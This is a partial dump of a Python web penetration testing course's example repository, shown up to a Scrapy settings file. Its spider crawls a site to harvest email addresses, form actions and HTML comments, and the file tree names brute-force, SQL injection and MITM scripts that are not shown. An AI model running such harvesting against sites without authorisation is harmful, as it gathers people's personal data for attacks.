├── Examples.tar.gz
├── Examples
├── .idea
│ ├── .name
│ ├── Examples.iml
│ ├── encodings.xml
│ ├── misc-DESKTOP-02TA9PR.xml
│ ├── misc.xml
│ ├── modules.xml
│ ├── vcs.xml
│ ├── workspace-DESKTOP-02TA9PR.xml
│ ├── workspace-libertad-2.xml
│ ├── workspace-libertad.xml
│ └── workspace.xml
├── Chapter02
│ └── Section-2
│ │ ├── Chapter-3.py
│ │ ├── Video-2-header.py
│ │ ├── Video-3-headers.py
│ │ ├── Video-3.py
│ │ └── Video-4.py
├── Chapter03
│ └── Section-3
│ │ ├── .idea
│ │ ├── .name
│ │ ├── Section-3.iml
│ │ ├── encodings.xml
│ │ ├── misc.xml
│ │ ├── modules.xml
│ │ ├── vcs.xml
│ │ └── workspace.xml
│ │ ├── basic_crawler
│ │ ├── basic_crawler
│ │ │ ├── __init__.py
│ │ │ ├── __init__.pyc
│ │ │ ├── items.py
│ │ │ ├── items.pyc
│ │ │ ├── pipelines.py
│ │ │ ├── settings.py
│ │ │ ├── settings.pyc
│ │ │ └── spiders
│ │ │ │ ├── __init__.py
│ │ │ │ ├── __init__.pyc
│ │ │ │ ├── spiderman.py
│ │ │ │ └── spiderman.pyc
│ │ └── scrapy.cfg
│ │ └── examples
│ │ ├── __init__.py
│ │ ├── __init__.pyc
│ │ ├── items.py
│ │ ├── items.pyc
│ │ ├── pipelines.py
│ │ ├── settings.py
│ │ ├── settings.pyc
│ │ ├── spiders
│ │ ├── __init__.py
│ │ ├── __init__.pyc
│ │ ├── spiderman-base.py
│ │ ├── spiderman-base.pyc
│ │ ├── spiderman-c.py
│ │ ├── spiderman-recursive.py
│ │ ├── spiderman-recursive.pyc
│ │ ├── spiderman.py
│ │ └── spiderman.pyc
│ │ └── test.json
├── Chapter04
│ └── Section-4
│ │ ├── common.txt
│ │ ├── commons.txt
│ │ ├── forzabruta-2.py
│ │ ├── forzabruta-3.py
│ │ ├── forzabruta-4.py
│ │ ├── forzabruta-back.py
│ │ ├── forzabruta.py
│ │ ├── ghostdriver.log
│ │ ├── test.py
│ │ └── timeoutsocket.py
├── Chapter05
│ └── Section-5
│ │ ├── Section 5 - Video 2.pptx
│ │ ├── back2basics.py
│ │ ├── back2digest.py
│ │ ├── back2forms.py
│ │ ├── brute-digest.py
│ │ ├── common.txt
│ │ ├── forzaBruta-forms.py
│ │ ├── pass.txt
│ │ └── passw.txt
├── Chapter06
│ └── Section-6
│ │ ├── SQLinjector-0.py
│ │ ├── SQLinjector-1.py
│ │ ├── SQLinjector-2.py
│ │ ├── SQLinjector-3.py
│ │ ├── SQLinjector-4.py
│ │ └── injections.txt
└── Chapter07
│ └── Section-7
│ ├── mitm-0.py
│ ├── mitm-1.py
│ ├── mitm-2.py
│ ├── mitm-3.py
│ └── sslcaudit.0
│ ├── tmpq8l6su-cert.pem
│ └── tmpq8l6su-key.pem
├── LICENSE
├── README.md
└── VM-info.txt
/Examples.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples.tar.gz
--------------------------------------------------------------------------------
/Examples/.idea/.name:
--------------------------------------------------------------------------------
1 | Examples
--------------------------------------------------------------------------------
/Examples/.idea/Examples.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Examples/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Examples/.idea/misc-DESKTOP-02TA9PR.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Examples/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Examples/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Examples/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Examples/.idea/workspace-DESKTOP-02TA9PR.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 | C:\Users\laramies\AppData\Roaming\Subversion
254 |
255 |
256 |
257 |
258 | 1448674096366
259 |
260 | 1448674096366
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
291 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
--------------------------------------------------------------------------------
/Examples/.idea/workspace-libertad.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 | $USER_HOME$/.subversion
353 | 125
354 |
355 |
356 |
357 |
358 | 1447365431218
359 |
360 | 1447365431218
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
392 |
393 |
394 |
395 |
396 |
397 |
398 |
399 |
400 |
401 |
402 |
403 |
404 |
405 |
406 |
407 |
408 |
409 |
410 |
411 |
412 |
413 |
414 |
415 |
416 |
417 |
418 |
419 |
420 |
421 |
422 |
423 |
424 |
425 |
426 |
427 |
428 |
429 |
430 |
431 |
432 |
433 |
434 |
435 |
436 |
437 |
438 |
439 |
440 |
441 |
442 |
443 |
444 |
445 |
446 |
447 |
448 |
449 |
450 |
451 |
452 |
453 |
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 |
463 |
464 |
465 |
466 |
467 |
468 |
469 |
470 |
471 |
472 |
473 |
474 |
475 |
476 |
477 |
478 |
479 |
480 |
481 |
482 |
483 |
484 |
485 |
486 |
487 |
488 |
489 |
490 |
491 |
492 |
493 |
494 |
495 |
496 |
497 |
498 |
499 |
500 |
501 |
502 |
503 |
504 |
505 |
506 |
507 |
508 |
509 |
510 |
511 |
512 |
513 |
514 |
515 |
516 |
517 |
518 |
519 |
520 |
521 |
522 |
523 |
524 |
525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 |
545 |
546 |
547 |
548 |
549 |
550 |
551 |
552 |
553 |
554 |
555 |
556 |
557 |
558 |
559 |
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
568 |
569 |
570 |
571 |
572 |
573 |
574 |
575 |
576 |
577 |
578 |
579 |
580 |
581 |
582 |
583 |
584 |
585 |
586 |
587 |
588 |
589 |
590 |
591 |
592 |
593 |
594 |
595 |
596 |
597 |
598 |
599 |
600 |
601 |
602 |
603 |
604 |
605 |
606 |
607 |
--------------------------------------------------------------------------------
/Examples/Chapter02/Section-2/Chapter-3.py:
--------------------------------------------------------------------------------
1 | import requests
2 | payload= {'url':'http://www.edge-security.com'}
3 | r=requests.get('http://httpbin.org/redirect-to',params=payload)
4 | print "Status code:"
5 | print "\t *" + str(r.status_code)
6 |
--------------------------------------------------------------------------------
/Examples/Chapter02/Section-2/Video-2-header.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env
2 | import requests
3 | r = requests.post('http://httpbin.org/post',data={'name':'packt'})
4 | print r.url
5 | print 'Status code:' + '\t[-]' + str(r.status_code) + '\n'
6 | print 'Server headers'
7 | print '****************************************'
8 | for x in r.headers:
9 | print '\t' + x + ' : ' + r.headers[x]
10 | print '****************************************\n'
11 | print r.text
12 |
--------------------------------------------------------------------------------
/Examples/Chapter02/Section-2/Video-3-headers.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env
2 | import requests
3 | myheaders={'user-agent':'Iphone 6'}
4 | r = requests.post('http://httpbin.org/post',data={'name':'packt'})
5 | print r.url
6 | print 'Status code:'
7 | print '\t[-]' + str(r.status_code) + '\n'
8 |
9 | print 'Server headers'
10 | print '****************************************'
11 | for x in r.headers:
12 | print '\t' + x + ' : ' + r.headers[x]
13 | print '****************************************\n'
14 |
15 | print "Content:\n"
16 | print r.text
17 |
--------------------------------------------------------------------------------
/Examples/Chapter02/Section-2/Video-3.py:
--------------------------------------------------------------------------------
1 | import requests
2 | payload= {'url':'http://www.edge-security.com'}
3 | r=requests.get('http://httpbin.org/redirect-to',params=payload)
4 | print "Status code:"
5 | print "\t *" + str(r.status_code)
6 |
--------------------------------------------------------------------------------
/Examples/Chapter02/Section-2/Video-4.py:
--------------------------------------------------------------------------------
1 | import requests
2 | url='http://httpbin.org/redirect-to'
3 | payload = {'url':'http://www.bing.com'}
4 | req = requests.get(url,params=payload)
5 | print req.text
6 | print "Response code: " + str(req.status_code)
7 | for x in req.history:
8 | print str(x.status_code) + ' : ' + x.url
9 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/.idea/.name:
--------------------------------------------------------------------------------
1 | Section-3
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/.idea/Section-3.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 | C:\Users\laramies\AppData\Roaming\Subversion
73 |
74 |
75 |
76 |
77 | 1453850402130
78 |
79 | 1453850402130
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/__init__.py
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/__init__.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/items.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define here the models for your scraped items
4 | #
5 | # See documentation in:
6 | # http://doc.scrapy.org/en/latest/topics/items.html
7 |
8 | import scrapy
9 |
10 |
11 | class BasicCrawlerItem(scrapy.Item):
12 | # define the fields for your item here like:
13 | # name = scrapy.Field()
14 | title = scrapy.Field()
15 | email = scrapy.Field()
16 | comments = scrapy.Field()
17 | form = scrapy.Field()
18 | location_url = scrapy.Field()
19 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/items.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/items.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/pipelines.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define your item pipelines here
4 | #
5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting
6 | # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
7 |
8 |
9 | class BasicCrawlerPipeline(object):
10 | def process_item(self, item, spider):
11 | return item
12 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/settings.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Scrapy settings for basic_crawler project
4 | #
5 | # For simplicity, this file contains only settings considered important or
6 | # commonly used. You can find more settings consulting the documentation:
7 | #
8 | # http://doc.scrapy.org/en/latest/topics/settings.html
9 | # http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
10 | # http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
11 |
12 | BOT_NAME = 'basic_crawler'
13 |
14 | SPIDER_MODULES = ['basic_crawler.spiders']
15 | NEWSPIDER_MODULE = 'basic_crawler.spiders'
16 |
17 |
18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent
19 | #USER_AGENT = 'basic_crawler (+http://www.yourdomain.com)'
20 |
21 | # Configure maximum concurrent requests performed by Scrapy (default: 16)
22 | #CONCURRENT_REQUESTS=32
23 |
24 | # Configure a delay for requests for the same website (default: 0)
25 | # See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
26 | # See also autothrottle settings and docs
27 | #DOWNLOAD_DELAY=3
28 | # The download delay setting will honor only one of:
29 | #CONCURRENT_REQUESTS_PER_DOMAIN=16
30 | #CONCURRENT_REQUESTS_PER_IP=16
31 |
32 | # Disable cookies (enabled by default)
33 | #COOKIES_ENABLED=False
34 |
35 | # Disable Telnet Console (enabled by default)
36 | #TELNETCONSOLE_ENABLED=False
37 |
38 | # Override the default request headers:
39 | #DEFAULT_REQUEST_HEADERS = {
40 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
41 | # 'Accept-Language': 'en',
42 | #}
43 |
44 | # Enable or disable spider middlewares
45 | # See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
46 | #SPIDER_MIDDLEWARES = {
47 | # 'basic_crawler.middlewares.MyCustomSpiderMiddleware': 543,
48 | #}
49 |
50 | # Enable or disable downloader middlewares
51 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
52 | #DOWNLOADER_MIDDLEWARES = {
53 | # 'basic_crawler.middlewares.MyCustomDownloaderMiddleware': 543,
54 | #}
55 |
56 | # Enable or disable extensions
57 | # See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
58 | #EXTENSIONS = {
59 | # 'scrapy.telnet.TelnetConsole': None,
60 | #}
61 |
62 | # Configure item pipelines
63 | # See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
64 | #ITEM_PIPELINES = {
65 | # 'basic_crawler.pipelines.SomePipeline': 300,
66 | #}
67 |
68 | # Enable and configure the AutoThrottle extension (disabled by default)
69 | # See http://doc.scrapy.org/en/latest/topics/autothrottle.html
70 | # NOTE: AutoThrottle will honour the standard settings for concurrency and delay
71 | #AUTOTHROTTLE_ENABLED=True
72 | # The initial download delay
73 | #AUTOTHROTTLE_START_DELAY=5
74 | # The maximum download delay to be set in case of high latencies
75 | #AUTOTHROTTLE_MAX_DELAY=60
76 | # Enable showing throttling stats for every response received:
77 | #AUTOTHROTTLE_DEBUG=False
78 |
79 | # Enable and configure HTTP caching (disabled by default)
80 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
81 | #HTTPCACHE_ENABLED=True
82 | #HTTPCACHE_EXPIRATION_SECS=0
83 | #HTTPCACHE_DIR='httpcache'
84 | #HTTPCACHE_IGNORE_HTTP_CODES=[]
85 | #HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
86 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/settings.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/settings.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/spiders/__init__.py:
--------------------------------------------------------------------------------
1 | # This package will contain the spiders of your Scrapy project
2 | #
3 | # Please refer to the documentation for information on how to create and manage
4 | # your spiders.
5 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/spiders/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/spiders/__init__.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/spiders/spiderman.py:
--------------------------------------------------------------------------------
1 | from scrapy.spiders import BaseSpider
2 | from scrapy.selector import Selector
3 | from basic_crawler.items import BasicCrawlerItem
4 | from scrapy.http import Request
5 | import re
6 |
7 |
8 | class MySpider(BaseSpider):
9 | name = "basic_crawler"
10 | allowed_domains = ['packtpub.com']
11 | start_urls = ["https://www.packtpub.com"]
12 |
13 | def parse(self, response):
14 | hxs = Selector(response)
15 |
16 | #CODE for scraping book titles
17 | #book_titles = hxs.xpath('//div[@class="book-block-title"]/text()').extract()
18 | #for title in book_titles:
19 | # book = NinjaCrawlerItem()
20 | # book["title"] = title
21 | # book["location_url"] = response.url
22 | # yield book
23 |
24 |
25 | #CODE for scraping Forms
26 | forms = hxs.xpath('//form/@action').extract()
27 | for form in forms:
28 | formy = BasicCrawlerItem()
29 | formy["form"] = form
30 | formy["location_url"] = response.url
31 | yield formy
32 |
33 | #CODE for scraping emails
34 | emails = hxs.xpath("//*[contains(text(),'@')]").extract()
35 | for email in emails:
36 | com = BasicCrawlerItem()
37 | com["email"] = email
38 | com["location_url"] = response.url
39 | yield com
40 |
41 |
42 | #CODE for scraping comments
43 | comments = hxs.xpath('//comment()').extract()
44 | for comment in comments:
45 | com = BasicCrawlerItem()
46 | com["comments"] = comment
47 | com["location_url"] = response.url
48 | yield com
49 |
50 | visited_links=[]
51 | links = hxs.xpath('//a/@href').extract()
52 | link_validator= re.compile("^(?:http|https):\/\/(?:[\w\.\-\+]+:{0,1}[\w\.\-\+]*@)?(?:[a-z0-9\-\.]+)(?::[0-9]+)?(?:\/|\/(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+)|\?(?:[\w#!:\.\?\+=&%@!\-\/\(\)]+))?$")
53 |
54 | for link in links:
55 | if link_validator.match(link) and not link in visited_links:
56 | visited_links.append(link)
57 | yield Request(link, self.parse)
58 | else:
59 | full_url=response.urljoin(link)
60 | visited_links.append(full_url)
61 | yield Request(full_url, self.parse)
62 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/spiders/spiderman.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/basic_crawler/basic_crawler/spiders/spiderman.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/basic_crawler/scrapy.cfg:
--------------------------------------------------------------------------------
1 | # Automatically created by: scrapy startproject
2 | #
3 | # For more information about the [deploy] section see:
4 | # https://scrapyd.readthedocs.org/en/latest/deploy.html
5 |
6 | [settings]
7 | default = basic_crawler.settings
8 |
9 | [deploy]
10 | #url = http://localhost:6800/
11 | project = basic_crawler
12 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/__init__.py
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/__init__.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/items.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define here the models for your scraped items
4 | #
5 | # See documentation in:
6 | # http://doc.scrapy.org/en/latest/topics/items.html
7 |
8 | import scrapy
9 |
10 |
11 | class BasicCrawlerItem(scrapy.Item):
12 | # define the fields for your item here like:
13 | title = scrapy.Field()
14 | link_url = scrapy.Field()
15 | comment = scrapy.Field()
16 | location_url = scrapy.Field()
17 | form = scrapy.Field()
18 | email = scrapy.Field()
19 |
20 | pass
21 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/items.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter03/Section-3/examples/items.pyc
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/pipelines.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define your item pipelines here
4 | #
5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting
6 | # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
7 |
8 |
9 | class BasicCrawlerPipeline(object):
10 | def process_item(self, item, spider):
11 | return item
12 |
--------------------------------------------------------------------------------
/Examples/Chapter03/Section-3/examples/settings.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Scrapy settings for basic_crawler project
4 | #
5 | # For simplicity, this file contains only settings considered important or
6 | # commonly used. You can find more settings consulting the documentation:
7 | #
8 | # http://doc.scrapy.org/en/latest/topics/settings.html
9 | # http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
10 | # http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
11 |
12 | BOT_NAME = 'basic_crawler'
13 |
14 | SPIDER_MODULES = ['basic_crawler.spiders']
15 | NEWSPIDER_MODULE = 'basic_crawler.spiders'
16 |
17 |
18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent
19 | #USER_AGENT = 'basic_crawler (+http://www.yourdomain.com)'
20 |
21 | # Configure maximum concurrent requests performed by Scrapy (default: 16)
22 | #CONCURRENT_REQUESTS=32
23 |
24 | # Configure a delay for requests for the same website (default: 0)
25 | # See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
26 | # See also autothrottle settings and docs
27 | #DOWNLOAD_DELAY=3
28 | # The download delay setting will honor only one of:
29 | #CONCURRENT_REQUESTS_PER_DOMAIN=16
30 | #CONCURRENT_REQUESTS_PER_IP=16
31 |
32 | # Disable cookies (enabled by default)
33 | #COOKIES_ENABLED=False
34 |
35 | # Disable Telnet Console (enabled by default)
36 | #TELNETCONSOLE_ENABLED=False
37 |
38 | # Override the default request headers:
39 | #DEFAULT_REQUEST_HEADERS = {
40 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
41 | # 'Accept-Language': 'en',
42 | #}
43 |
44 | # Enable or disable spider middlewares
45 | # See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
46 | #SPIDER_MIDDLEWARES = {
47 | # 'basic_crawler.middlewares.MyCustomSpiderMiddleware': 543,
48 | #}
49 |
50 | # Enable or disable downloader middlewares
51 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
52 | #DOWNLOADER_MIDDLEWARES = {
53 | # 'basic_crawler.middlewares.MyCustomDownloaderMiddleware': 543,
54 | #}
55 |
56 | # Enable or disable extensions
